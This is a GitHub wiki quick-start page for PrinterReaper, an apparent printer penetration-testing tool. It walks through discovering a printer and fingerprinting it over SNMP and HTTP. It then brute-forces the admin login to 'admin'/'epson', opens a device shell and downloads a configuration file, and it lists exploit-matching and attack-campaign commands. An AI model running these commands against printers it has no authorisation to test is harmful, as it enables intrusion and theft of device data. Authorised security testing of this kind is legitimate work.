-
Notifications
You must be signed in to change notification settings - Fork 0
Quick Start
Andre Henrique edited this page Mar 25, 2026
·
1 revision
Get your first results in under 60 seconds.
git clone https://github.com/mrhenrike/PrinterReaper.git
cd PrinterReaper
python -m venv .venv && source .venv/bin/activate # Linux/macOS
python -m venv .venv && .venv\Scripts\activate # Windows
pip install -r requirements.txtpython printer-reaper.py --discover-localOutput:
[SNMP] Scanning 192.168.0.0/24 ...
192.168.0.152 EPSON L3250 Ready
python printer-reaper.py 192.168.0.152 --scan --no-nvdOutput (key fields):
Make : Epson
Model : L3250 Series
Serial : XAABT77481
Firmware: 05.22.XF26P8
HTTP : 200 OK (EPSON Web Config)
SNMP : public sysDescr=EPSON L3250 Series
python printer-reaper.py 192.168.0.152 --bruteforce \
--bf-vendor epson --bf-serial XAABT77481 --bf-no-variationsOutput:
[+] FOUND: HTTP → 'admin' / 'epson'
python printer-reaper.py 192.168.0.152 auto192.168.0.152:/> id
EPSON L3250 Series, Firmware 05.22.XF26P8
192.168.0.152:/> ls /
./
../
EpsonInternal/
webServer/
192.168.0.152:/> download /webServer/config/soe.xml
# Guided menu (no arguments)
python printer-reaper.py
# Full scan + exploit matching
python printer-reaper.py 192.168.1.100 --scan --xpl
# Full attack campaign (dry-run)
python printer-reaper.py 192.168.1.100 --attack-matrix
# Send a print job
python printer-reaper.py 192.168.1.100 --send-job document.txt
# List all exploit modules
python printer-reaper.py --xpl-list
# Check API key status
python printer-reaper.py --check-config